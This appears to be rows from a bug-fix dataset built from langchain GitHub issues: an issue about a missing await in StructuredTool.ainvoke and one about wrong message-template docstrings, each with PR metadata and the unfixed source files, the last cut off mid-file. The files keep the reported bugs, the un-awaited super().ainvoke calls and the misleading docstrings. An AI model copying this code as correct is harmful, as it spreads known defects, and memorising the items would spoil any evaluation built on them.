for blob in loader.yield_blobs():
print(blob)
"""
def __init__(
self,
path: Union[str, Path],
*,
glob: str = "**/[!.]*",
exclude: Sequence[str] = (),
suffixes: Optional[Sequence[str]] = None,
show_progress: bool = False,
) -> None:
"""Initialize with a path to directory and how to glob over it.
Args:
path: Path to directory to load from
glob: Glob pattern relative to the specified path
by default set to pick up all non-hidden files
exclude: patterns to exclude from results, use glob syntax
suffixes: Provide to keep only files with these suffixes
Useful when wanting to keep files with different suffixes
Suffixes must include the dot, e.g. ".txt"
show_progress: If true, will show a progress bar as the files are loaded.
This forces an iteration through all matching files
to count them prior to loading them.
Examples:
.. code-block:: python
# Recursively load all text files in a directory.
loader = FileSystemBlobLoader("/path/to/directory", glob="**/*.txt")
# Recursively load all non-hidden files in a directory.
loader = FileSystemBlobLoader("/path/to/directory", glob="**/[!.]*")
# Load all files in a directory without recursion.
loader = FileSystemBlobLoader("/path/to/directory", glob="*")
# Recursively load all files in a directory, except for py or pyc files.
loader = FileSystemBlobLoader(
"/path/to/directory",
glob="**/*.txt",
exclude=["**/*.py", "**/*.pyc"]
)
"""
if isinstance(path, Path):
_path = path
elif isinstance(path, str):
_path = Path(path)
else:
raise TypeError(f"Expected str or Path, got {type(path)}")
self.path = _path
self.glob = glob
self.suffixes = set(suffixes or [])
self.show_progress = show_progress
self.exclude = exclude
def yield_blobs(
self,
) -> Iterable[Blob]:
"""Yield blobs that match the requested pattern."""
iterator = _make_iterator(
length_func=self.count_matching_files, show_progress=self.show_progress
)
for path in iterator(self._yield_paths()):
yield Blob.from_path(path)
def _yield_paths(self) -> Iterable[Path]:
"""Yield paths that match the requested pattern."""
paths = self.path.glob(self.glob)
for path in paths:
if self.exclude:
if any(path.match(glob) for glob in self.exclude):
continue
if path.is_file():
if self.suffixes and path.suffix not in self.suffixes:
continue
yield path
def count_matching_files(self) -> int:
"""Count files that match the pattern without loading them."""
# Carry out a full iteration to count the files without
# materializing anything expensive in memory.
num = 0
for _ in self._yield_paths():
num += 1
return num
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,080 | StructuredTool ainvoke isn't await parent class ainvoke | [code pointer](https://github.com/langchain-ai/langchain/blob/74fcfed4e2bdd186c2869a07008175a9b66b1ed4/libs/langchain/langchain/tools/base.py#L588C16-L588C16)
In `langchain.tools.base`, change
```python
Class StructuredTool(BaseTool):
"""Tool that can operate on any number of inputs."""
description: str = ""
args_schema: Type[BaseModel] = Field(..., description="The tool schema.")
"""The input arguments' schema."""
func: Optional[Callable[..., Any]]
"""The function to run when the tool is called."""
coroutine: Optional[Callable[..., Awaitable[Any]]] = None
"""The asynchronous version of the function."""
# --- Runnable ---
async def ainvoke(
self,
input: Union[str, Dict],
config: Optional[RunnableConfig] = None,
**kwargs: Any,
) -> Any:
if not self.coroutine:
# If the tool does not implement async, fall back to default implementation
return await asyncio.get_running_loop().run_in_executor(
None, partial(self.invoke, input, config, **kwargs)
)
return super().ainvoke(input, config, **kwargs)
```
to
```python
Class StructuredTool(BaseTool):
"""Tool that can operate on any number of inputs."""
description: str = ""
args_schema: Type[BaseModel] = Field(..., description="The tool schema.")
"""The input arguments' schema."""
func: Optional[Callable[..., Any]]
"""The function to run when the tool is called."""
coroutine: Optional[Callable[..., Awaitable[Any]]] = None
"""The asynchronous version of the function."""
# --- Runnable ---
async def ainvoke(
self,
input: Union[str, Dict],
config: Optional[RunnableConfig] = None,
**kwargs: Any,
) -> Any:
if not self.coroutine:
# If the tool does not implement async, fall back to default implementation
return await asyncio.get_running_loop().run_in_executor(
None, partial(self.invoke, input, config, **kwargs)
)
return await super().ainvoke(input, config, **kwargs)
``` | https://github.com/langchain-ai/langchain/issues/10080 | https://github.com/langchain-ai/langchain/pull/10300 | fdba711d28375e86b23cfbad10a17feb67276ef5 | 28de8d132c8c4f7ecfe246c61375d91a04ff0abf | "2023-09-01T07:36:50Z" | python | "2023-09-08T02:54:53Z" | libs/langchain/langchain/tools/base.py | """Base implementation for tools or skills."""
from __future__ import annotations
import asyncio
import inspect
import warnings
from abc import abstractmethod
from functools import partial
from inspect import signature
from typing import Any, Awaitable, Callable, Dict, List, Optional, Tuple, Type, Union
from langchain.callbacks.base import BaseCallbackManager
from langchain.callbacks.manager import (
AsyncCallbackManager,
AsyncCallbackManagerForToolRun,
CallbackManager,
CallbackManagerForToolRun,
Callbacks,
)
from langchain.pydantic_v1 import (
BaseModel,
Extra,
Field,
create_model,
root_validator,
validate_arguments,
)
from langchain.schema.runnable import Runnable, RunnableConfig
class SchemaAnnotationError(TypeError):
"""Raised when 'args_schema' is missing or has an incorrect type annotation."""
def _create_subset_model(
name: str, model: BaseModel, field_names: list
) -> Type[BaseModel]:
"""Create a pydantic model with only a subset of model's fields."""
fields = {}
for field_name in field_names:
field = model.__fields__[field_name]
fields[field_name] = (field.outer_type_, field.field_info)
return create_model(name, **fields) # type: ignore
def _get_filtered_args(
inferred_model: Type[BaseModel],
func: Callable,
) -> dict:
"""Get the arguments from a function's signature."""
schema = inferred_model.schema()["properties"]
valid_keys = signature(func).parameters
return {k: schema[k] for k in valid_keys if k not in ("run_manager", "callbacks")}
class _SchemaConfig:
"""Configuration for the pydantic model."""
extra: Any = Extra.forbid
arbitrary_types_allowed: bool = True
def create_schema_from_function(
model_name: str,
func: Callable,
) -> Type[BaseModel]:
"""Create a pydantic schema from a function's signature.
Args:
model_name: Name to assign to the generated pydandic schema
func: Function to generate the schema from
Returns:
A pydantic model with the same arguments as the function
"""
# https://docs.pydantic.dev/latest/usage/validation_decorator/
validated = validate_arguments(func, config=_SchemaConfig) # type: ignore
inferred_model = validated.model # type: ignore
if "run_manager" in inferred_model.__fields__:
del inferred_model.__fields__["run_manager"]
if "callbacks" in inferred_model.__fields__:
del inferred_model.__fields__["callbacks"]
# Pydantic adds placeholder virtual fields we need to strip
valid_properties = _get_filtered_args(inferred_model, func)
return _create_subset_model(
f"{model_name}Schema", inferred_model, list(valid_properties)
)
class ToolException(Exception):
"""An optional exception that tool throws when execution error occurs.
When this exception is thrown, the agent will not stop working,
but will handle the exception according to the handle_tool_error
variable of the tool, and the processing result will be returned
to the agent as observation, and printed in red on the console.
"""
pass
class BaseTool(BaseModel, Runnable[Union[str, Dict], Any]):
"""Interface LangChain tools must implement."""
def __init_subclass__(cls, **kwargs: Any) -> None:
"""Create the definition of the new tool class."""
super().__init_subclass__(**kwargs)
args_schema_type = cls.__annotations__.get("args_schema", None)
if args_schema_type is not None:
if args_schema_type is None or args_schema_type == BaseModel:
# Throw errors for common mis-annotations.
# TODO: Use get_args / get_origin and fully
# specify valid annotations.
typehint_mandate = """
class ChildTool(BaseTool):
...
args_schema: Type[BaseModel] = SchemaClass
..."""
name = cls.__name__
raise SchemaAnnotationError(
f"Tool definition for {name} must include valid type annotations"
f" for argument 'args_schema' to behave as expected.\n"
f"Expected annotation of 'Type[BaseModel]'"
f" but got '{args_schema_type}'.\n"
f"Expected class looks like:\n"
f"{typehint_mandate}"
)
name: str
"""The unique name of the tool that clearly communicates its purpose."""
description: str
"""Used to tell the model how/when/why to use the tool.
You can provide few-shot examples as a part of the description.
"""
args_schema: Optional[Type[BaseModel]] = None
"""Pydantic model class to validate and parse the tool's input arguments."""
return_direct: bool = False
"""Whether to return the tool's output directly. Setting this to True means
that after the tool is called, the AgentExecutor will stop looping.
"""
verbose: bool = False
"""Whether to log the tool's progress."""
callbacks: Callbacks = Field(default=None, exclude=True)
"""Callbacks to be called during tool execution."""
callback_manager: Optional[BaseCallbackManager] = Field(default=None, exclude=True)
"""Deprecated. Please use callbacks instead."""
tags: Optional[List[str]] = None
"""Optional list of tags associated with the tool. Defaults to None
These tags will be associated with each call to this tool,
and passed as arguments to the handlers defined in `callbacks`.
You can use these to eg identify a specific instance of a tool with its use case.
"""
metadata: Optional[Dict[str, Any]] = None
"""Optional metadata associated with the tool. Defaults to None
This metadata will be associated with each call to this tool,
and passed as arguments to the handlers defined in `callbacks`.
You can use these to eg identify a specific instance of a tool with its use case.
"""
handle_tool_error: Optional[
Union[bool, str, Callable[[ToolException], str]]
] = False
"""Handle the content of the ToolException thrown."""
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
arbitrary_types_allowed = True
@property
def is_single_input(self) -> bool:
"""Whether the tool only accepts a single input."""
keys = {k for k in self.args if k != "kwargs"}
return len(keys) == 1
@property
def args(self) -> dict:
if self.args_schema is not None:
return self.args_schema.schema()["properties"]
else:
schema = create_schema_from_function(self.name, self._run)
return schema.schema()["properties"]
# --- Runnable ---
def invoke(
self,
input: Union[str, Dict],
config: Optional[RunnableConfig] = None,
**kwargs: Any,
) -> Any:
config = config or {}
return self.run(
input,
callbacks=config.get("callbacks"),
tags=config.get("tags"),
metadata=config.get("metadata"),
**kwargs,
)
async def ainvoke(
self,
input: Union[str, Dict],
config: Optional[RunnableConfig] = None,
**kwargs: Any,
) -> Any:
if type(self)._arun == BaseTool._arun:
# If the tool does not implement async, fall back to default implementation
return super().ainvoke(input, config, **kwargs)
config = config or {}
return await self.arun(
input,
callbacks=config.get("callbacks"),
tags=config.get("tags"),
metadata=config.get("metadata"),
**kwargs,
)
# --- Tool ---
def _parse_input(
self,
tool_input: Union[str, Dict],
) -> Union[str, Dict[str, Any]]:
"""Convert tool input to pydantic model."""
input_args = self.args_schema
if isinstance(tool_input, str):
if input_args is not None:
key_ = next(iter(input_args.__fields__.keys()))
input_args.validate({key_: tool_input})
return tool_input
else:
if input_args is not None:
result = input_args.parse_obj(tool_input)
return {k: v for k, v in result.dict().items() if k in tool_input}
return tool_input
@root_validator()
def raise_deprecation(cls, values: Dict) -> Dict:
"""Raise deprecation warning if callback_manager is used."""
if values.get("callback_manager") is not None:
warnings.warn(
"callback_manager is deprecated. Please use callbacks instead.",
DeprecationWarning,
)
values["callbacks"] = values.pop("callback_manager", None)
return values
@abstractmethod
def _run(
self,
*args: Any,
**kwargs: Any,
) -> Any:
"""Use the tool.
Add run_manager: Optional[CallbackManagerForToolRun] = None
to child implementations to enable tracing,
"""
async def _arun(
self,
*args: Any,
**kwargs: Any,
) -> Any:
"""Use the tool asynchronously.
Add run_manager: Optional[AsyncCallbackManagerForToolRun] = None
to child implementations to enable tracing,
"""
return await asyncio.get_running_loop().run_in_executor(
None,
partial(self._run, **kwargs),
*args,
)
def _to_args_and_kwargs(self, tool_input: Union[str, Dict]) -> Tuple[Tuple, Dict]:
# For backwards compatibility, if run_input is a string,
# pass as a positional argument.
if isinstance(tool_input, str):
return (tool_input,), {}
else:
return (), tool_input
def run(
self,
tool_input: Union[str, Dict],
verbose: Optional[bool] = None,
start_color: Optional[str] = "green",
color: Optional[str] = "green",
callbacks: Callbacks = None,
*,
tags: Optional[List[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> Any:
"""Run the tool."""
parsed_input = self._parse_input(tool_input)
if not self.verbose and verbose is not None:
verbose_ = verbose
else:
verbose_ = self.verbose
callback_manager = CallbackManager.configure(
callbacks,
self.callbacks,
verbose_,
tags,
self.tags,
metadata,
self.metadata,
)
# TODO: maybe also pass through run_manager is _run supports kwargs
new_arg_supported = signature(self._run).parameters.get("run_manager")
run_manager = callback_manager.on_tool_start(
{"name": self.name, "description": self.description},
tool_input if isinstance(tool_input, str) else str(tool_input),
color=start_color,
**kwargs,
)
try:
tool_args, tool_kwargs = self._to_args_and_kwargs(parsed_input)
observation = (
self._run(*tool_args, run_manager=run_manager, **tool_kwargs)
if new_arg_supported
else self._run(*tool_args, **tool_kwargs)
)
except ToolException as e:
if not self.handle_tool_error:
run_manager.on_tool_error(e)
raise e
elif isinstance(self.handle_tool_error, bool):
if e.args:
observation = e.args[0]
else:
observation = "Tool execution error"
elif isinstance(self.handle_tool_error, str):
observation = self.handle_tool_error
elif callable(self.handle_tool_error):
observation = self.handle_tool_error(e)
else:
raise ValueError(
f"Got unexpected type of `handle_tool_error`. Expected bool, str "
f"or callable. Received: {self.handle_tool_error}"
)
run_manager.on_tool_end(
str(observation), color="red", name=self.name, **kwargs
)
return observation
except (Exception, KeyboardInterrupt) as e:
run_manager.on_tool_error(e)
raise e
else:
run_manager.on_tool_end(
str(observation), color=color, name=self.name, **kwargs
)
return observation
async def arun(
self,
tool_input: Union[str, Dict],
verbose: Optional[bool] = None,
start_color: Optional[str] = "green",
color: Optional[str] = "green",
callbacks: Callbacks = None,
*,
tags: Optional[List[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> Any:
"""Run the tool asynchronously."""
parsed_input = self._parse_input(tool_input)
if not self.verbose and verbose is not None:
verbose_ = verbose
else:
verbose_ = self.verbose
callback_manager = AsyncCallbackManager.configure(
callbacks,
self.callbacks,
verbose_,
tags,
self.tags,
metadata,
self.metadata,
)
new_arg_supported = signature(self._arun).parameters.get("run_manager")
run_manager = await callback_manager.on_tool_start(
{"name": self.name, "description": self.description},
tool_input if isinstance(tool_input, str) else str(tool_input),
color=start_color,
**kwargs,
)
try:
# We then call the tool on the tool input to get an observation
tool_args, tool_kwargs = self._to_args_and_kwargs(parsed_input)
observation = (
await self._arun(*tool_args, run_manager=run_manager, **tool_kwargs)
if new_arg_supported
else await self._arun(*tool_args, **tool_kwargs)
)
except ToolException as e:
if not self.handle_tool_error:
await run_manager.on_tool_error(e)
raise e
elif isinstance(self.handle_tool_error, bool):
if e.args:
observation = e.args[0]
else:
observation = "Tool execution error"
elif isinstance(self.handle_tool_error, str):
observation = self.handle_tool_error
elif callable(self.handle_tool_error):
observation = self.handle_tool_error(e)
else:
raise ValueError(
f"Got unexpected type of `handle_tool_error`. Expected bool, str "
f"or callable. Received: {self.handle_tool_error}"
)
await run_manager.on_tool_end(
str(observation), color="red", name=self.name, **kwargs
)
return observation
except (Exception, KeyboardInterrupt) as e:
await run_manager.on_tool_error(e)
raise e
else:
await run_manager.on_tool_end(
str(observation), color=color, name=self.name, **kwargs
)
return observation
def __call__(self, tool_input: str, callbacks: Callbacks = None) -> str:
"""Make tool callable."""
return self.run(tool_input, callbacks=callbacks)
class Tool(BaseTool):
"""Tool that takes in function or coroutine directly."""
description: str = ""
func: Optional[Callable[..., str]]
"""The function to run when the tool is called."""
coroutine: Optional[Callable[..., Awaitable[str]]] = None
"""The asynchronous version of the function."""
# --- Runnable ---
async def ainvoke(
self,
input: Union[str, Dict],
config: Optional[RunnableConfig] = None,
**kwargs: Any,
) -> Any:
if not self.coroutine:
# If the tool does not implement async, fall back to default implementation
return await asyncio.get_running_loop().run_in_executor(
None, partial(self.invoke, input, config, **kwargs)
)
return super().ainvoke(input, config, **kwargs)
# --- Tool ---
@property
def args(self) -> dict:
"""The tool's input arguments."""
if self.args_schema is not None:
return self.args_schema.schema()["properties"]
# For backwards compatibility, if the function signature is ambiguous,
# assume it takes a single string input.
return {"tool_input": {"type": "string"}}
def _to_args_and_kwargs(self, tool_input: Union[str, Dict]) -> Tuple[Tuple, Dict]:
"""Convert tool input to pydantic model."""
args, kwargs = super()._to_args_and_kwargs(tool_input)
# For backwards compatibility. The tool must be run with a single input
all_args = list(args) + list(kwargs.values())
if len(all_args) != 1:
raise ToolException(
f"Too many arguments to single-input tool {self.name}."
f" Args: {all_args}"
)
return tuple(all_args), {}
def _run(
self,
*args: Any,
run_manager: Optional[CallbackManagerForToolRun] = None,
**kwargs: Any,
) -> Any:
"""Use the tool."""
if self.func:
new_argument_supported = signature(self.func).parameters.get("callbacks")
return (
self.func(
*args,
callbacks=run_manager.get_child() if run_manager else None,
**kwargs,
)
if new_argument_supported
else self.func(*args, **kwargs)
)
raise NotImplementedError("Tool does not support sync")
async def _arun(
self,
*args: Any,
run_manager: Optional[AsyncCallbackManagerForToolRun] = None,
**kwargs: Any,
) -> Any:
"""Use the tool asynchronously."""
if self.coroutine:
new_argument_supported = signature(self.coroutine).parameters.get(
"callbacks"
)
return (
await self.coroutine(
*args,
callbacks=run_manager.get_child() if run_manager else None,
**kwargs,
)
if new_argument_supported
else await self.coroutine(*args, **kwargs)
)
else:
return await asyncio.get_running_loop().run_in_executor(
None, partial(self._run, run_manager=run_manager, **kwargs), *args
)
# TODO: this is for backwards compatibility, remove in future
def __init__(
self, name: str, func: Optional[Callable], description: str, **kwargs: Any
) -> None:
"""Initialize tool."""
super(Tool, self).__init__(
name=name, func=func, description=description, **kwargs
)
@classmethod
def from_function(
cls,
func: Optional[Callable],
name: str, # We keep these required to support backwards compatibility
description: str,
return_direct: bool = False,
args_schema: Optional[Type[BaseModel]] = None,
coroutine: Optional[
Callable[..., Awaitable[Any]]
] = None, # This is last for compatibility, but should be after func
**kwargs: Any,
) -> Tool:
"""Initialize tool from a function."""
if func is None and coroutine is None:
raise ValueError("Function and/or coroutine must be provided")
return cls(
name=name,
func=func,
coroutine=coroutine,
description=description,
return_direct=return_direct,
args_schema=args_schema,
**kwargs,
)
class StructuredTool(BaseTool):
"""Tool that can operate on any number of inputs."""
description: str = ""
args_schema: Type[BaseModel] = Field(..., description="The tool schema.")
"""The input arguments' schema."""
func: Optional[Callable[..., Any]]
"""The function to run when the tool is called."""
coroutine: Optional[Callable[..., Awaitable[Any]]] = None
"""The asynchronous version of the function."""
# --- Runnable ---
async def ainvoke(
self,
input: Union[str, Dict],
config: Optional[RunnableConfig] = None,
**kwargs: Any,
) -> Any:
if not self.coroutine:
# If the tool does not implement async, fall back to default implementation
return await asyncio.get_running_loop().run_in_executor(
None, partial(self.invoke, input, config, **kwargs)
)
return super().ainvoke(input, config, **kwargs)
# --- Tool ---
@property
def args(self) -> dict:
"""The tool's input arguments."""
return self.args_schema.schema()["properties"]
def _run(
self,
*args: Any,
run_manager: Optional[CallbackManagerForToolRun] = None,
**kwargs: Any,
) -> Any:
"""Use the tool."""
if self.func:
new_argument_supported = signature(self.func).parameters.get("callbacks")
return (
self.func(
*args,
callbacks=run_manager.get_child() if run_manager else None,
**kwargs,
)
if new_argument_supported
else self.func(*args, **kwargs)
)
raise NotImplementedError("Tool does not support sync")
async def _arun(
self,
*args: Any,
run_manager: Optional[AsyncCallbackManagerForToolRun] = None,
**kwargs: Any,
) -> str:
"""Use the tool asynchronously."""
if self.coroutine:
new_argument_supported = signature(self.coroutine).parameters.get(
"callbacks"
)
return (
await self.coroutine(
*args,
callbacks=run_manager.get_child() if run_manager else None,
**kwargs,
)
if new_argument_supported
else await self.coroutine(*args, **kwargs)
)
return await asyncio.get_running_loop().run_in_executor(
None,
self._run,
partial(self._run, run_manager=run_manager, **kwargs),
*args,
)
@classmethod
def from_function(
cls,
func: Optional[Callable] = None,
coroutine: Optional[Callable[..., Awaitable[Any]]] = None,
name: Optional[str] = None,
description: Optional[str] = None,
return_direct: bool = False,
args_schema: Optional[Type[BaseModel]] = None,
infer_schema: bool = True,
**kwargs: Any,
) -> StructuredTool:
"""Create tool from a given function.
A classmethod that helps to create a tool from a function.
Args:
func: The function from which to create a tool
coroutine: The async function from which to create a tool
name: The name of the tool. Defaults to the function name
description: The description of the tool. Defaults to the function docstring
return_direct: Whether to return the result directly or as a callback
args_schema: The schema of the tool's input arguments
infer_schema: Whether to infer the schema from the function's signature
**kwargs: Additional arguments to pass to the tool
Returns:
The tool
Examples:
.. code-block:: python
def add(a: int, b: int) -> int:
\"\"\"Add two numbers\"\"\"
return a + b
tool = StructuredTool.from_function(add)
tool.run(1, 2) # 3
"""
if func is not None:
source_function = func
elif coroutine is not None:
source_function = coroutine
else:
raise ValueError("Function and/or coroutine must be provided")
name = name or source_function.__name__
description = description or source_function.__doc__
if description is None:
raise ValueError(
"Function must have a docstring if description not provided."
)
# Description example:
# search_api(query: str) - Searches the API for the query.
sig = signature(source_function)
description = f"{name}{sig} - {description.strip()}"
_args_schema = args_schema
if _args_schema is None and infer_schema:
_args_schema = create_schema_from_function(f"{name}Schema", source_function)
return cls(
name=name,
func=func,
coroutine=coroutine,
args_schema=_args_schema,
description=description,
return_direct=return_direct,
**kwargs,
)
def tool(
*args: Union[str, Callable],
return_direct: bool = False,
args_schema: Optional[Type[BaseModel]] = None,
infer_schema: bool = True,
) -> Callable:
"""Make tools out of functions, can be used with or without arguments.
Args:
*args: The arguments to the tool.
return_direct: Whether to return directly from the tool rather
than continuing the agent loop.
args_schema: optional argument schema for user to specify
infer_schema: Whether to infer the schema of the arguments from
the function's signature. This also makes the resultant tool
accept a dictionary input to its `run()` function.
Requires:
- Function must be of type (str) -> str
- Function must have a docstring
Examples:
.. code-block:: python
@tool
def search_api(query: str) -> str:
# Searches the API for the query.
return
@tool("search", return_direct=True)
def search_api(query: str) -> str:
# Searches the API for the query.
return
"""
def _make_with_name(tool_name: str) -> Callable:
def _make_tool(dec_func: Callable) -> BaseTool:
if inspect.iscoroutinefunction(dec_func):
coroutine = dec_func
func = None
else:
coroutine = None
func = dec_func
if infer_schema or args_schema is not None:
return StructuredTool.from_function(
func,
coroutine,
name=tool_name,
return_direct=return_direct,
args_schema=args_schema,
infer_schema=infer_schema,
)
# If someone doesn't want a schema applied, we must treat it as
# a simple string->string function
if func.__doc__ is None:
raise ValueError(
"Function must have a docstring if "
"description not provided and infer_schema is False."
)
return Tool(
name=tool_name,
func=func,
description=f"{tool_name} tool",
return_direct=return_direct,
coroutine=coroutine,
)
return _make_tool
if len(args) == 1 and isinstance(args[0], str):
# if the argument is a string, then we use the string as the tool name
# Example usage: @tool("search", return_direct=True)
return _make_with_name(args[0])
elif len(args) == 1 and callable(args[0]):
# if the argument is a function, then we use the function name as the tool name
# Example usage: @tool
return _make_with_name(args[0].__name__)(args[0])
elif len(args) == 0:
# if there are no arguments, then we use the function name as the tool name
# Example usage: @tool(return_direct=True)
def _partial(func: Callable[[str], str]) -> BaseTool:
return _make_with_name(func.__name__)(func)
return _partial
else:
raise ValueError("Too many arguments for tool decorator")
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,378 | DOC: Incorrect and confusing documentation of AIMessagePromptTemplate and HumanMessagePromptTemplate | ### Issue with current documentation:
[AIMessagePromptTemplate documentation](https://api.python.langchain.com/en/latest/prompts/langchain.prompts.chat.AIMessagePromptTemplate.html#langchain-prompts-chat-aimessageprompttemplate) incorrectly and confusingly describes the message as "... This is a message that is not sent to the user."
[HumanMessagePromptTemplate documentation](https://api.python.langchain.com/en/latest/prompts/langchain.prompts.chat.HumanMessagePromptTemplate.html#langchain-prompts-chat-humanmessageprompttemplate) incorrectly and confusingly describes the message as "... This is a message that is sent to the user."
Compare to the documentation for [AIMessage](https://api.python.langchain.com/en/latest/schema/langchain.schema.messages.AIMessage.html#langchain-schema-messages-aimessage) and [HumanMessage](https://api.python.langchain.com/en/latest/schema/langchain.schema.messages.HumanMessage.html#langchain-schema-messages-humanmessage), which correctly and clearly describe each message as "A message from an AI" and "A message from a human." respectively.
### Idea or request for content:
AIMessagePromptTemplate should be described as "AI message prompt template. This is a message that is sent to the user from the AI."
HumanMessagePromptTemplate should be described as "Human message prompt template. This is a message that is sent from the user to the AI."
These are clear, concise and consistent with documentation of the message schema.
I will submit a PR with revised docstrings for each class. This should, then, be reflected in the API reference documentation upon next build. | https://github.com/langchain-ai/langchain/issues/10378 | https://github.com/langchain-ai/langchain/pull/10379 | 8c0f391815eac61f2b5d1b993e9bc4795808696f | c902a1545bfbc3015defcd1c3ee435d38db4ee34 | "2023-09-08T16:43:51Z" | python | "2023-09-08T22:53:08Z" | libs/langchain/langchain/prompts/chat.py | """Chat prompt template."""
from __future__ import annotations
from abc import ABC, abstractmethod
from pathlib import Path
from typing import (
Any,
Callable,
Dict,
List,
Sequence,
Set,
Tuple,
Type,
TypeVar,
Union,
overload,
)
from langchain._api import deprecated
from langchain.load.serializable import Serializable
from langchain.prompts.base import StringPromptTemplate
from langchain.prompts.prompt import PromptTemplate
from langchain.pydantic_v1 import Field, root_validator
from langchain.schema import (
BasePromptTemplate,
PromptValue,
)
from langchain.schema.messages import (
AIMessage,
BaseMessage,
ChatMessage,
HumanMessage,
SystemMessage,
get_buffer_string,
)
class BaseMessagePromptTemplate(Serializable, ABC):
"""Base class for message prompt templates."""
@property
def lc_serializable(self) -> bool:
"""Whether this object should be serialized.
Returns:
Whether this object should be serialized.
"""
return True
@abstractmethod
def format_messages(self, **kwargs: Any) -> List[BaseMessage]:
"""Format messages from kwargs. Should return a list of BaseMessages.
Args:
**kwargs: Keyword arguments to use for formatting.
Returns:
List of BaseMessages.
"""
@property
@abstractmethod
def input_variables(self) -> List[str]:
"""Input variables for this prompt template.
Returns:
List of input variables.
"""
def __add__(self, other: Any) -> ChatPromptTemplate:
"""Combine two prompt templates.
Args:
other: Another prompt template.
Returns:
Combined prompt template.
"""
prompt = ChatPromptTemplate(messages=[self])
return prompt + other
class MessagesPlaceholder(BaseMessagePromptTemplate):
"""Prompt template that assumes variable is already list of messages."""
variable_name: str
"""Name of variable to use as messages."""
def format_messages(self, **kwargs: Any) -> List[BaseMessage]:
"""Format messages from kwargs.
Args:
**kwargs: Keyword arguments to use for formatting.
Returns:
List of BaseMessage.
"""
value = kwargs[self.variable_name]
if not isinstance(value, list):
raise ValueError(
f"variable {self.variable_name} should be a list of base messages, "
f"got {value}"
)
for v in value:
if not isinstance(v, BaseMessage):
raise ValueError(
f"variable {self.variable_name} should be a list of base messages,"
f" got {value}"
)
return value
@property
def input_variables(self) -> List[str]:
"""Input variables for this prompt template.
Returns:
List of input variable names.
"""
return [self.variable_name]
MessagePromptTemplateT = TypeVar(
"MessagePromptTemplateT", bound="BaseStringMessagePromptTemplate"
)
"""Type variable for message prompt templates."""
class BaseStringMessagePromptTemplate(BaseMessagePromptTemplate, ABC):
"""Base class for message prompt templates that use a string prompt template."""
prompt: StringPromptTemplate
"""String prompt template."""
additional_kwargs: dict = Field(default_factory=dict)
"""Additional keyword arguments to pass to the prompt template."""
@classmethod
def from_template(
cls: Type[MessagePromptTemplateT],
template: str,
template_format: str = "f-string",
**kwargs: Any,
) -> MessagePromptTemplateT:
"""Create a class from a string template.
Args:
template: a template.
template_format: format of the template.
**kwargs: keyword arguments to pass to the constructor.
Returns:
A new instance of this class.
"""
prompt = PromptTemplate.from_template(template, template_format=template_format)
return cls(prompt=prompt, **kwargs)
@classmethod
def from_template_file(
cls: Type[MessagePromptTemplateT],
template_file: Union[str, Path],
input_variables: List[str],
**kwargs: Any,
) -> MessagePromptTemplateT:
"""Create a class from a template file.
Args:
template_file: path to a template file. String or Path.
input_variables: list of input variables.
**kwargs: keyword arguments to pass to the constructor.
Returns:
A new instance of this class.
"""
prompt = PromptTemplate.from_file(template_file, input_variables)
return cls(prompt=prompt, **kwargs)
@abstractmethod
def format(self, **kwargs: Any) -> BaseMessage:
"""Format the prompt template.
Args:
**kwargs: Keyword arguments to use for formatting.
Returns:
Formatted message.
"""
def format_messages(self, **kwargs: Any) -> List[BaseMessage]:
"""Format messages from kwargs.
Args:
**kwargs: Keyword arguments to use for formatting.
Returns:
List of BaseMessages.
"""
return [self.format(**kwargs)]
@property
def input_variables(self) -> List[str]:
"""
Input variables for this prompt template.
Returns:
List of input variable names.
"""
return self.prompt.input_variables
class ChatMessagePromptTemplate(BaseStringMessagePromptTemplate):
"""Chat message prompt template."""
role: str
"""Role of the message."""
def format(self, **kwargs: Any) -> BaseMessage:
"""Format the prompt template.
Args:
**kwargs: Keyword arguments to use for formatting.
Returns:
Formatted message.
"""
text = self.prompt.format(**kwargs)
return ChatMessage(
content=text, role=self.role, additional_kwargs=self.additional_kwargs
)
class HumanMessagePromptTemplate(BaseStringMessagePromptTemplate):
"""Human message prompt template. This is a message that is sent to the user."""
def format(self, **kwargs: Any) -> BaseMessage:
"""Format the prompt template.
Args:
**kwargs: Keyword arguments to use for formatting.
Returns:
Formatted message.
"""
text = self.prompt.format(**kwargs)
return HumanMessage(content=text, additional_kwargs=self.additional_kwargs)
class AIMessagePromptTemplate(BaseStringMessagePromptTemplate):
"""AI message prompt template. This is a message that is not sent to the user."""
def format(self, **kwargs: Any) -> BaseMessage:
"""Format the prompt template.
Args:
**kwargs: Keyword arguments to use for formatting.
Returns:
Formatted message.
"""
text = self.prompt.format(**kwargs)
return AIMessage(content=text, additional_kwargs=self.additional_kwargs)
class SystemMessagePromptTemplate(BaseStringMessagePromptTemplate):
"""System message prompt template.
This is a message that is not sent to the user.
"""
def format(self, **kwargs: Any) -> BaseMessage:
"""Format the prompt template.
Args:
**kwargs: Keyword arguments to use for formatting.
Returns:
Formatted message.
"""
text = self.prompt.format(**kwargs)
return SystemMessage(content=text, additional_kwargs=self.additional_kwargs)
class ChatPromptValue(PromptValue):
"""Chat prompt value.
A type of a prompt value that is built from messages.
"""
messages: List[BaseMessage]
"""List of messages."""
def to_string(self) -> str:
"""Return prompt as string."""
return get_buffer_string(self.messages)
def to_messages(self) -> List[BaseMessage]:
"""Return prompt as a list of messages."""
return self.messages
class BaseChatPromptTemplate(BasePromptTemplate, ABC):
"""Base class for chat prompt templates."""
@property
def lc_attributes(self) -> Dict:
"""
Return a list of attribute names that should be included in the
serialized kwargs. These attributes must be accepted by the
constructor.
"""
return {"input_variables": self.input_variables}
def format(self, **kwargs: Any) -> str:
"""Format the chat template into a string.
Args:
**kwargs: keyword arguments to use for filling in template variables
in all the template messages in this chat template.
Returns:
formatted string
"""
return self.format_prompt(**kwargs).to_string()
def format_prompt(self, **kwargs: Any) -> PromptValue:
"""
Format prompt. Should return a PromptValue.
Args:
**kwargs: Keyword arguments to use for formatting.
Returns:
PromptValue.
"""
messages = self.format_messages(**kwargs)
return ChatPromptValue(messages=messages)
@abstractmethod
def format_messages(self, **kwargs: Any) -> List[BaseMessage]:
"""Format kwargs into a list of messages."""
MessageLike = Union[BaseMessagePromptTemplate, BaseMessage, BaseChatPromptTemplate]
MessageLikeRepresentation = Union[
MessageLike,
Tuple[str, str],
